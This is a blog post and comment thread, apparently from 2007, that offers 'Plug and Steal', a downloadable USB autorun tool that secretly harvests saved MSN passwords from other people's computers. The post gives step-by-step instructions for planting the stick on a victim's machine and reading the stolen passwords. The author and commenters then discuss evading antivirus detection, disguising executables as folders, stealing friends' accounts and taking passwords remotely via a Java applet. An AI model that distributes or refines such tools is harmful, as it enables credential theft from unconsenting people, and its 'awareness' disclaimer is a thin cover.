EDITED:Version 2.0 is out, click here to get it!
I've been extremely busy lately, working
on a business software solution (almost done) so yesterday night i
decided to take a break and code something fun, I came up with a
nice idea, I call it "Plug and Steal" all you have to do is extract
the zip file in the root of your usb memory stick. Now everytime
you plug your memory stick in someones computer and open it, a
software will run in the background and steal the msn passwords
available on that computer! The passwords will be stored in the usb
device, in a hidden folder called "www.DngloZ.com", give it a shot!
Click to download (edited:redirects to new version)
PS:I take no responsibility in what you do, my main purpose of writing this was to show people the
dangers and security risks involved while using usb sticks...
Instructions to get the Passwords
1) Download the zip file
2) Extract it in your usb drive, in the root (not in a folder in your usb)
3) Safely remove your usb
4) Connect the usb in someones computer
5) Open the usb folder by double clicking on the usbs icon from the
My Computer
Congrats, now you have the passwords!
To view the passwords file,
1) Connect the usb DONT OPEN
IT!
2) Right click on the usb devices icon from My Computer
3) Choose open (no other method will work, it will overwrite the
password file by your computers passwords)
4) From the view settings, enable View hidden files
5) Open the hidden folder called "www.DngloZ.com" in the usb
6) Open the text file "www.DngloZ.com.txt" in that folder
Voila, you got the passwords...
I haven't tried it on a pc with an antivirus installed (i dont use
antiviruses) so please let me know if an anti virus reports it as a
virus so i can take care of it for further version ;)
Man it's really awesome how u did it :P symantec can't detect it coz its not technically a virus :P and i changed the label to RaMsEs :D... yalla... waiting for ur next invention :D
Guest
2. 04-03-2007 22:20
Thanks
Glad u like it man
Guest
3. 06-03-2007 09:31
Thanks
OK, here is my 2 cents When I plug into my computer, it pops up the menu "what do you want windows to do". If I choose "do nothing" it does exactly that - nothing :-) If I choose "Open folder to view files - using the program provided on the device" - it will steal the password and open the invisible folder for view. I run AVAST! antivirus, usually it will recognize these sort of programs as treat but not this one. If you improve the recognition part - and add a stealer for more IM's - it will be perfect.
Guest
4. 06-03-2007 10:04
Welcome
You're 2 cents are appreciated Well even though i can get all sorts of passwords, (or install viruses or anything u can think of) this way, my main objective is not to cause harm, but to demonstrate how easy it is to run hidden softwares from a usb, think of all the times people plugged a usb in ur pc! What were they really doing? its kind of scary... After saying all this, i'll add some more IMs once i get some free time
Guest
5. 06-03-2007 13:32
Welcome
Oh, believe me I understand your point perfectly... I did this demo to ppl all the time The issue is to go all the way with the demo and make them understand, if it require them to act (i.e select an option) they will say "we don't push buttons and that leaves you with no answer... Don't get offended, your idea is great and I like it very much... just trying to make a point here.
Guest
6. 06-03-2007 14:37
hmm
Well it all depends on the presentation of the demo, someone can be asking a file from you, so u put it in this usb and i doubt they will notice anything or u tell ur teacher that ur hw is in the usb or ask for a file from someone and plug ur usb to take it..... glad u like it!
Guest
7. 06-03-2007 17:59
Symantec caught it
Symantec Client Security v10.1 caught it.
Guest
8. 06-03-2007 18:20
Bummer
Thanks Chris, did it report it as a virus or as a warning that a sw is messing with the registry?
Guest
9. 07-03-2007 22:53
Bummer
McAfee Virusscan 8.5 with DAT 4978 caught it as PW Cracker and prevented it from functioning.
Guest
10. 07-03-2007 23:08
Bummer
Thanks Mike, well so far McAfee and Symantec caught it therefore the app im using from nirsoft.com should be replaced, if anyone knows a password extractor which is undetectable by av, please lemme know so i can replace. I'll do some further research myself once i get some free time. Thanks again!
Guest
11. 27-03-2007 01:10
No password
I ran the utility and in the text file it only shows the email address of the user, in the password field, its blank. Am i doing something wrong? Do you have one for yahoo??
Guest
12. 27-03-2007 01:15
No password
That means the password is not saved in the pc, this tool only gets the passwords which are saved ("Remember my password" is enabled at least once), as for yahoo, i can do it, its just a matter of time which i currently dont have! but soon! i'll remake this to be undetectable and to get aol,msn and yahoo passwords!
Guest
13. 27-03-2007 01:33
Coool
Thanks for the update and let me know when you have got one for yahoo!!
Guest
14. 31-03-2007 12:58
Sir
Hello, i run the latest avast home release and the program detected your executable as a trojan. Further more, anyone who connects to msn on a computer: ther must be a logfile of data that was entered no? Greetz and keep it on.
Guest
15. 31-03-2007 13:36
thanks
Thank you Josdevos for the info, when you click on "Remember my password" in msn, ur password will be saved in the pc, the application that im using is from http://www.nirsoft.net, this application will decrypt that password, the problem is that this is what's making antiviruses go crazy, therefore i either have to rewrite my own version or try to play with the file a bit until it won't be recognised by antiviruses, i will check it out soon, hopefully this week, if there's any other features you find helpful to include, let me know and i'll add in the next release! cheers
Guest
16. 01-04-2007 16:16
Unsaved Passwords
Nice job. Is there any way of getting passwords that haven't been saved?
Guest
17. 01-04-2007 16:20
hmmm
I doubt u can get passwords which are not saved, but from the top of my head, u can install a keylogger and get the log after a few days... google keylogger and u'll find alot of them, some free, some are viruses and some u got to pay for
Guest
18. 02-04-2007 22:50
??
did u know that there are alot of viruses which are already spreading using usbs? i wrote my app and im 100% sure there are no viruses/backdoors in it, im guessing the computer u used the usb on is infected! and it infected ur usb along the way which ended up infecting ur pc, please scan that pc and let me know if the other pc was infected because im 100% sure its not from my program...
Guest
19. 05-05-2007 20:25
Password
Dear that was an amazing piece of work i really appreciated that a lot..i myself tried it out and bingo it works very nice.. i would like to know is there anyway that i can know details of a user by just knowing his ID or IP and is there anyway of stealing a Password of a person whos situated in another country without having any physical touch with his computer like from net or something like that i have tried out the IPinfo but it just gives me some details but it isnt the users details its the ISP thats providing the connection and even the IP that i tracked out is also the ISP provided IP that means i cant have a proper track of the Client ... i tried a lot hacking down one ID on MSN but still cant make it out is there anyway u can help me out with it???
Guest
20. 05-05-2007 20:57
MSN Password
Riz, i'm not an msn guru, and i hope ur not causing harm to anyone, the purpose of the software is to simply raise awareness of the dangers of usb devices... but just to answer your question (but i won't do it as it's against my standards) you can get someones password by just making them visit a website and by tricking them to accept to run a java applet...
Guest
21. 09-05-2007 23:30
MSN Password
Hey, great piece of art! Hoping to see and updated version which supports more programs. Keep up your awareness campaign!
Guest
22. 11-05-2007 14:10
Thanks, I found a new way
Thanks dude, When I checked your autorun.inf file, I found a way to hide my executable file, by changing its icon, as if it looks like a folder. I also a learned a technique to run any application in background, you have done really a good job, Thanks again.
Keep up ! Best of Luck for UPcoming IMs versions update.
Guest
23. 11-05-2007 16:52
=0)
Glad you liked it Samundra, it took me less than 10 minutes to write it im not gona update this cuz i feel kind of bad for writing it in the first place, but i might do something which will allow u to protect ur usb with a password (it will encrypt everything in it as well)
Guest
24. 23-05-2007 00:56
vista
Hi It works well for windows xp but not for vista. Do you plan to modify it for vista?
Thanks
Guest
25. 23-05-2007 01:02
Vista
Well i'm not really a microsoft fan, and unless it comes preinstalled in my next laptop, i wouldnt even consider installing it sooo I don't think a vista version would be out any time soon!
Guest
26. 29-05-2007 00:21
?
Which antivirus report this file as suspicious?
Do you know? I tested on kaspersky and it was ok.
Guest
27. 25-06-2007 02:48
aaaa
you are good
Guest
28. 25-06-2007 12:33
A suggestion
Hello, I've noticed that when you insert the USB in different PCs the password file gets overwrited, so is there a way to make the name of the txt the actual e-mail address of the person?
PS: If you want to advertise your site, advertise it in a different way than naming every file and folder with it.
~Gjs1992
Guest
29. 25-06-2007 14:01
re:suggestion
it's not made to be practical, what you're asking is very easy to do... and if you don't like it, simply don't use it!
Guest
30. 25-06-2007 21:27
I did not intend to offend you.
Hello DngLoZ, I'm very sorry if I sounded offending, but quite frankly, I like the folder to be named "Password-Stealer", set to read-only and hidden, all the .txt files in it should have their users' e-mail address, and how about adding sorta like a feature to password-lock the hidden folder. Thanks.
PS: I adore your program.
~Gjs1992
Guest
31. 26-06-2007 15:21
New Version
A new version will be coming out today or tomorow, the new version is not detectable by anti viruses (well we'll see about that) and the passwords will be as Gjs wanted, in a file named after the email. Keep on checking the site for the updated version!
Guest
32. 27-06-2007 16:56
New Version
Version 2.0 is out, check the site for it...
Guest
33. 16-11-2007 01:25
scd
Guest
34. 27-11-2007 14:13
HELP PLEASE
I've downloaded the Version 2 on my desktop..then i extracted there and the folder named Plugandsteal_v2 appeared.. i opened it and only have that "Bla" paintshop Icon...is it normal? is it te only file s'posed to be in? and is all i have to do to put it in the root folder of my USB key?? ..thanks for answerin'!! and thnanks for tha program!
Guest
35. 09-12-2007 13:35
does it work for win mobile
Hi, I have a Samsung i600 running win mobile can I just copy paste your file into the root? which file is holding the password ?
Guest
36. 18-12-2007 14:40
does it work for win mobile
actually i already have the same problem about the extra zip folder and the pain i did know if i dowload the right the version or not and where is the root i find it a littel complicated sorry maby for other than me it's easy maby i'm stupid but really i need help from any1 can cause i really need the password of the msn so if any1 can help me reply i check the site everyday mabay 10 times to see what knew and can i know the password of msn without this software it's wonderfull but really i didn't know how to use it thanks
Guest
37. 05-01-2008 09:42
Vista
for vista i just double clicked on the .exe folder and it made a pas folder with the .txt file inside that\'s it. Nice work btw!!
Guest
38. 13-01-2008 21:48
coolness makajooulness
Guest
39. 17-01-2008 12:01
pw
it works on vista
Guest
40. 29-01-2008 14:30
what about yahoo!
This site is very useful! its so..good.lol.
Can anyone tell me how to hack yahoo id passwords? Dont worry! Am not gonna do it as a crime..(ethical).
Mail me the info to
This email address is being protected from spam bots, you need Javascript enabled to view it
Guest
41. 29-02-2008 11:15
what about yahoo!
can u fix the driver if u accidently extracted it?
Guest
42. 05-03-2008 23:11
driver
most of the time u can find the driver (its not really a driver) off the website of the usb provider, if that doesnt work, just google, i'm sure its out there...
Guest
43. 11-03-2008 20:28
VIRUS ALERT
AVG antivirus picks it up as ah trojan back door.
wen i try it the PAS foler is returning empty
Guest
44. 25-03-2008 17:56
thank you`
this is a nicee trick
Guest
45. 26-03-2008 18:36
Question
Hey but if i insert the usb stick in MY computer do i get all the passwords from my msn list or just my password(s) ?? i need to get a friends password to get some1s email XD !!
Guest
46. 07-04-2008 20:38
help on msn password
ok so I got the passwords that where stored on my cp but how do I get ones that are not stored on here?
Guest
47. 17-06-2008 23:55
HELP!
can any1 tell me how to remove this hack from my USB?Thanks!
Guest
Write Comment
Please keep the topic of messages relevant to the subject of the article.
Personal verbal attacks will be deleted.
Please don't use comments to plug your web site. Such material will be removed.
Just ensure to *Refresh* your browser for a new security code to be displayed prior to clicking on the 'Send' button.
Keep in mind that the above process only applies if you simply entered the wrong security code.
Well even though i can get all sorts of passwords, (or install viruses or anything u can think of) this way, my main objective is not to cause harm, but to demonstrate how easy it is to run hidden softwares from a usb, think of all the times people plugged a usb in ur pc! What were they really doing? its kind of scary... After saying all this, i'll add some more IMs once i get some free time 
and that leaves you with no answer... 
im not gona update this cuz i feel kind of bad for writing it in the first place, but i might do something which will allow u to protect ur usb with a password (it will encrypt everything in it as well)
i did know if i dowload the right the version or not and where is the root i find it a littel complicated sorry maby for other than me it's easy maby i'm stupid but really i need help from any1 can cause i really need the password of the msn so if any1 can help me reply i check the site everyday mabay 10 times to see what knew and can i know the password of msn without this software it's wonderfull but really i didn't know how to use it thanks
